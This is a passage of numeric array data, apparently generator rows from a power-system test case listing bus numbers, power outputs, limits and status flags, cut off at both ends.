0, 0, 0, 0, 0], [771, 480.262029, 0, 9999, -9999, 1.0, 100, 1, 690.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [772, 18.8, 0, 9999, -9999, 1.0, 100, 1, 18.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [774, 33.5, 0, 9999, -9999, 1.0, 100, 1, 33.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [777, 79.0, 0, 9999, -9999, 1.0, 100, 1, 79.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [778, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [781, 945.539978, 0, 9999, -9999, 1.0, 100, 1, 1310.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [784, 766.730012, 0, 9999, -9999, 1.0, 100, 1, 1275.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [785, 3.0, 0, 9999, -9999, 1.0, 100, 1, 3.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [787, 778.0, 0, 9999, -9999, 1.0, 100, 1, 778.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [788, 875.0, 0, 9999, -9999, 1.0, 100, 1, 875.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [789, 77.4, 0, 9999, -9999, 1.0, 100, 1, 77.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [791, 10.0, 0, 9999, -9999, 1.0, 100, 1, 10.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [792, 62.7, 0, 9999, -9999, 1.0, 100, 1, 62.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [795, 13.6, 0, 9999, -9999, 1.0, 100, 1, 13.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [800, 36.5, 0, 9999, -9999, 1.0, 100, 1, 36.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [801, 50.0, 0, 9999, -9999, 1.0, 100, 1, 50.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [802, 500.0, 0, 9999, -9999, 1.0, 100, 1, 500.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [805, 686.521154, 0, 9999, -9999, 1.0, 100, 1, 1410.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [806, 35.8, 0, 9999, -9999, 1.0, 100, 1, 35.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [808, 217.5, 0, 9999, -9999, 1.0, 100, 1, 217.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [809, 12.5, 0, 9999, -9999, 1.0, 100, 1, 12.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [811, 25.2, 0, 9999, -9999, 1.0, 100, 1, 25.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [814, 89.0, 0, 9999, -9999, 1.0, 100, 1, 89.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [816, 80.1, 0, 9999, -9999, 1.0, 100, 1, 80.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [817, 54.0, 0, 9999, -9999, 1.0, 100, 1, 54.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [821, 82.5, 0, 9999, -9999, 1.0, 100, 1, 82.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [822, 134.0, 0, 9999, -9999, 1.0, 100, 1, 134.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [826, 58.0, 0, 9999, -9999, 1.0, 100, 1, 58.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [830, 89.0, 0, 9999, -9999, 1.0, 100, 1, 89.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [835, 63.7, 0, 9999, -9999, 1.0, 100, 1, 63.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [836, 25.5, 0, 9999, -9999, 1.0, 100, 1, 25.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [837, 180.95184, 0, 9999, -9999, 1.0, 100, 1, 472.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [839, 73.3, 0, 9999, -9999, 1.0, 100, 1, 73.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [841, 23.3, 0, 9999, -9999, 1.0, 100, 1, 23.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [844, 40.0, 0, 9999, -9999, 1.0, 100, 1, 40.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [845, 318.0, 0, 9999, -9999, 1.0, 100, 1, 318.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [849, 779.0, 0, 9999, -9999, 1.0, 100, 1, 779.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [850, 16.0, 0, 9999, -9999, 1.0, 100, 1, 16.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [851, 79.5, 0, 9999, -9999, 1.0, 100, 1, 79.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [853, 11.6, 0, 9999, -9999, 1.0, 100, 1, 11.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [855, 688.0, 0, 9999, -9999, 1.0, 100, 1, 688.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [856, 36.0, 0, 9999, -9999, 1.0, 100, 1, 36.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [857, 1402.0, 0, 9999, -9999, 1.0, 100, 1, 1402.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [858, 56.8, 0, 9999, -9999, 1.0, 100, 1, 56.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [860, 25.0, 0, 9999, -9999, 1.0, 100, 1, 25.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [865, 11.0, 0, 9999, -9999, 1.0, 100, 1, 11.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [867, 319.509726, 0, 9999, -9999, 1.0, 100, 1, 769.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [869, 1360.0, 0, 9999, -9999, 1.0, 100, 1, 1360.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [870, 58.4, 0, 9999, -9999, 1.0, 100, 1, 58.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [872, 22.5, 0, 9999, -9999, 1.0, 100, 1, 22.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [874, 20.7, 0, 9999, -9999, 1.0, 100, 1, 20.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [875, 24.4, 0, 9999, -9999, 1.0, 100, 1, 24.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [882, 17.4, 0, 9999, -9999, 1.0, 100, 1, 17.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [883, 18.0, 0, 9999, -9999, 1.0, 100, 1, 18.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [885, 35.220336, 0, 9999, -9999, 1.0, 100, 1, 490.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [886, 2572.0, 0, 9999, -9999, 1.0, 100, 1, 2572.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [889, 9.5, 0, 9999, -9999, 1.0, 100, 1, 9.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [890, 48.0, 0, 9999, -9999, 1.0, 100, 1, 48.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [893, 60.0, 0, 9999, -9999, 1.0, 100, 1, 60.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [894, 158.0, 0, 9999, -9999, 1.0, 100, 1, 158.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [895, 19.0, 0, 9999, -9999, 1.0, 100, 1, 19.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [896, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [898, 84.6, 0, 9999, -9999, 1.0, 100, 1, 84.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [900, 112.6, 0, 9999, -9999, 1.0, 100, 1, 112.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [902, 19.5, 0, 9999, -9999, 1.0, 100, 1, 19.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [903, 20.1, 0, 9999, -9999, 1.0, 100, 1, 20.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [905, 137.3, 0, 9999, -9999, 1.0, 100, 1, 137.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [906, 66.0, 0, 9999, -9999, 1.0, 100, 1, 66.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [907, 67.3, 0, 9999, -9999, 1.0, 100, 1, 67.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [909, 36.8, 0, 9999, -9999, 1.0, 100, 1, 36.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [915, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [917, 17.0, 0, 9999, -9999, 1.0, 100, 1, 17.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [918, 38.5, 0, 9999, -9999, 1.0, 100, 1, 38.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [920, 12.8, 0, 9999, -9999, 1.0, 100, 1, 12.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [921, 124.0, 0, 9999, -9999, 1.0, 100, 1, 124.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [922, 164.0, 0, 9999, -9999, 1.0, 100, 1, 164.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [923, 146.0, 0, 9999, -9999, 1.0, 100, 1, 146.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [925, 26.0, 0, 9999, -9999, 1.0, 100, 1, 26.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [931, 217.1, 0, 9999, -9999, 1.0, 100, 1, 217.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [935, 23.1, 0, 9999, -9999, 1.0, 100, 1, 23.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [936, 104.4, 0, 9999, -9999, 1.0, 100, 1, 104.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [937, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [939, 0.1, 0, 9999, -9999, 1.0, 100, 1, 0.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [940, 29.6, 0, 9999, -9999, 1.0, 100, 1, 29.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [944, 25.4, 0, 9999, -9999, 1.0, 100, 1, 25.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [950, 16.0, 0, 9999, -9999, 1.0, 100, 1, 16.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [952, 31.7, 0, 9999, -9999, 1.0, 100, 1, 31.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [958, 66.7, 0, 9999, -9999, 1.0, 100, 1, 66.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [959, 45.5, 0, 9999, -9999, 1.0, 100, 1, 45.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [960, 26.5, 0, 9999, -9999, 1.0, 100, 1, 26.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [963, 694.60663, 0, 9999, -9999, 1.0, 100, 1, 875.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [965, 352.0, 0, 9999, -9999, 1.0, 100, 1, 352.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [966, 66.0, 0, 9999, -9999, 1.0, 100, 1, 66.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [967, 37.5, 0, 9999, -9999, 1.0, 100, 1, 37.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [969, 56.9, 0, 9999, -9999, 0.999642, 100, 1, 56.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [971, 20.0, 0, 9999, -9999, 1.0, 100, 1, 20.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [973, 1347.0, 0, 9999, -9999, 1.0, 100, 1, 1347.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [976, 26.9, 0, 9999, -9999, 1.0, 100, 1, 26.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [978, 4.6, 0, 9999, -9999, 1.0, 100, 1, 4.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [982, 9.9, 0, 9999, -9999, 1.0, 100, 1, 9.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [983, 44.0, 0, 9999, -9999, 1.0, 100, 1, 44.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [984, 465.0, 0, 9999, -9999, 1.0, 100, 1, 465.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [985, 22.0, 0, 9999, -9999, 1.0, 100, 1, 22.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [986, 11.2, 0, 9999, -9999, 1.0, 100, 1, 11.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [987, 164.5, 0, 9999, -9999, 1.0, 100, 1, 164.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [988, 5.1, 0, 9999, -9999, 1.0, 100, 1, 5.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [993, 392.0, 0, 9999, -9999, 1.0, 100, 1, 392.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [994, 33.0, 0, 9999, -9999, 1.0, 100, 1, 33.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [995, 4.2, 0, 9999, -9999, 1.0, 100, 1, 4.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [997, 18.8, 0, 9999, -9999, 1.0, 100, 1, 18.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [999, 15.6, 0, 9999, -9999, 1.0, 100, 1, 15.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1000, 49.0, 0, 9999, -9999, 1.0, 100, 1, 49.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1002, 9.9, 0, 9999, -9999, 1.0, 100, 1, 9.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1003, 900.0, 0, 9999, -9999, 1.0, 100, 1, 900.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1007, 23.3, 0, 9999, -9999, 1.0, 100, 1, 23.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1008, 49.0, 0, 9999, -9999, 1.0, 100, 1, 49.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1010, 750.0, 0, 9999, -9999, 1.0, 100, 1, 750.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1011, 18.7, 0, 9999, -9999, 1.0, 100, 1, 18.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1012, 2535.718021, 0, 9999, -9999, 1.0, 100, 1, 2835.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1014, 661.77734, 0, 9999, -9999, 1.0, 100, 1, 750.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1026, 655.6, 0, 9999, -9999, 1.0, 100, 1, 655.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1027, 9.38333, 0, 9999, -9999, 1.0, 100, 1, 48.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1028, 400.0, 0, 9999, -9999, 1.0, 100, 1, 400.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1029, 60.0, 0, 9999, -9999, 1.0, 100, 1, 60.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1030, 533.909757, 0, 9999, -9999, 1.0, 100, 1, 1018.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1031, 1444.01774, 0, 9999, -9999, 1.0, 100, 1, 1447.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1032, 22.641304, 0, 9999, -9999, 1.0, 100, 1, 153.510391, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1033, 8.383941, 0, 9999, -9999, 1.0, 100, 1, 50.164506, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1034, 13.867796, 0, 9999, -9999, 1.0, 100, 1, 84.262779, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1035, 7.426334, 0, 9999, -9999, 1.0, 100, 1, 49.886469, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1036, 11.572634, 0, 9999, -9999, 1.0, 100, 1, 67.223077, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1037, 8.282092, 0, 9999, -9999, 1.0, 100, 1, 94.684044, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1038, 7.47176, 0, 9999, -9999, 1.0, 100, 1, 85.798525, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1039, 4.907118, 0, 9999, -9999, 1.0, 100, 1, 132.724114, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1040, 0.001709, 0, 9999, -9999, 1.0, 100, 1, 0.064179, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1041, 13.322094, 0, 9999, -9999, 1.0, 100, 1, 204.187624, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1042, 1.847573, 0, 9999, -9999, 1.0, 100, 1, 52.70053, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1043, 0.384746, 0, 9999, -9999, 1.0, 100, 1, 6.035538, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1044, 4.415795, 0, 9999, -9999, 1.0, 100, 1, 36.163532, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1045, 10.0889, 0, 9999, -9999, 1.0, 100, 1, 61.836204, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1046, 28.232285, 0, 9999, -9999, 1.0, 100, 1, 106.787063, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1047, 2.068755, 0, 9999, -9999, 1.0, 100, 1, 13.029581, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1048, 14.214846, 0, 9999, -9999, 1.0, 100, 1, 71.656883, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1049, 27.148478, 0, 9999, -9999, 1.0, 100, 1, 293.755375, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1050, 7.311541, 0, 9999, -9999, 1.0, 100, 1, 52.781606, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1051, 31.558713, 0, 9999, -9999, 1.0, 100, 1, 304.42978, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1052, 8.792317, 0, 9999, -9999, 1.0, 100, 1, 20.66869, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1053, 7.229857, 0, 9999, -9999, 1.0, 100, 1, 16.368087, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1054, 142.308164, 0, 9999, -9999, 1.0, 100, 1, 273.855776, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1055, 0.115658, 0, 9999, -9999, 1.0, 100, 1, 2.856069, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1056, 19.095103, 0, 9999, -9999, 1.0, 100, 1, 603.943953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1057, 44.650958, 0, 9999, -9999, 1.0, 100, 1, 426.979979, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1058, 44.638523, 0, 9999, -9999, 1.0, 100, 1, 1055.735174, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1059, 18.795846, 0, 9999, -9999, 1.0, 100, 1, 414.871332, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1060, 0.487031, 0, 9999, -9999, 1.0, 100, 1, 10.351632, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1061, 12.113163, 0, 9999, -9999, 1.0, 100, 1, 161.862597, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1062, 0.114471, 0, 9999, -9999, 1.0, 100, 1, 2.878561, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1063, 0.322345, 0, 9999, -9999, 1.0, 100, 1, 8.670916, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1064, 12.449929, 0, 9999, -9999, 1.0, 100, 1, 209.786524, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1065, 32.291636, 0, 9999, -9999, 1.0, 100, 1, 339.421643, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1066, 22.097721, 0, 9999, -9999, 1.0, 100, 1, 134.399019, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1067, 11.905632, 0, 9999, -9999, 1.0, 100, 1, 32.653526, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1068, 2.193248, 0, 9999, -9999, 1.0, 100, 1, 5.009022, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1069, 1.153444, 0, 9999, -9999, 1.0, 100, 1, 3.190759, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1070, 0.396461, 0, 9999, -9999, 1.0, 100, 1, 0.788599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1071, 2.389175, 0, 9999, -9999, 1.0, 100, 1, 4.328696, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1072, 25.965396, 0, 9999, -9999, 1.0, 100, 1, 112.606433, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1073, 29.437522, 0, 9999, -9999, 1.0, 100, 1, 77.81765, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1074, 33.612216, 0, 9999, -9999, 1.0, 100, 1, 153.592986, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1075, 9.322009, 0, 9999, -9999, 1.0, 100, 1, 15.783448, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1076, 0.102272, 0, 9999, -9999, 1.0, 100, 1, 2.29551, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1077, 3.150152, 0, 9999, -9999, 1.0, 100, 1, 26.120041, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1078, 2.441808, 0, 9999, -9999, 1.0, 100, 1, 34.413246, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1079, 16.014073, 0, 9999, -9999, 1.0, 100, 1, 72.327992, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1080, 16.676799, 0, 9999, -9999, 1.0, 100, 1, 132.149983, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1081, 49.931581, 0, 9999, -9999, 1.0, 100, 1, 405.642115, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1082, 70.609564, 0, 9999, -9999, 1.0, 100, 1, 510.054159, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1083, 64.095972, 0, 9999, -9999, 1.0, 100, 1, 633.681488, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1084, 54.660217, 0, 9999, -9999, 1.0, 100, 1, 602.719371, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1085, 25.170102, 0, 9999, -9999, 1.0, 100, 1, 113.714399, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1086, 34.098941, 0, 9999, -9999, 1.0, 100, 1, 225.59917, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1087, 30.129734, 0, 9999, -9999, 1.0, 100, 1, 116.66597, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1088, 11.734743, 0, 9999, -9999, 1.0, 100, 1, 36.782492, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1089, 48.018258, 0, 9999, -9999, 1.0, 100, 1, 384.449592, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1090, 39.946608, 0, 9999, -9999, 1.0, 100, 1, 89.140897, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1091, 7.303461, 0, 9999, -9999, 1.0, 100, 1, 45.7939, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1092, 8.460022, 0, 9999, -9999, 1.0, 100, 1, 54.002032, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1093, 44.498454, 0, 9999, -9999, 1.0, 100, 1, 155.605298, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1094, 0.882963, 0, 9999, -9999, 1.0, 100, 1, 3.759038, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1095, 0.047627, 0, 9999, -9999, 1.0, 100, 1, 0.204951, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1096, 25.111974, 0, 9999, -9999, 1.0, 100, 1, 84.50612, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1097, 1.356771, 0, 9999, -9999, 1.0, 100, 1, 4.601122, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1098, 23.056987, 0, 9999, -9999, 1.0, 100, 1, 71.025499, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1099, 108.783318, 0, 9999, -9999, 1.0, 100, 1, 290.937198, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1100, 0.000736, 0, 9999, -9999, 1.0, 100, 1, 0.026696, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1101, 8.095544, 0, 9999, -9999, 1.0, 100, 1, 83.930665, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1102, 26.153366, 0, 9999, -9999, 1.0, 100, 1, 350.979988, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1103, 21.855756, 0, 9999, -9999, 1.0, 100, 1, 245.381701, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1104, 0.052591, 0, 9999, -9999, 1.0, 100, 1, 0.206918, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1105, 0.670137, 0, 9999, -9999, 1.0, 100, 1, 2.178593, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1106, 0.711063, 0, 9999, -9999, 1.0, 100, 1, 2.289793, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1107, 19.431181, 0, 9999, -9999, 1.0, 100, 1, 76.221615, 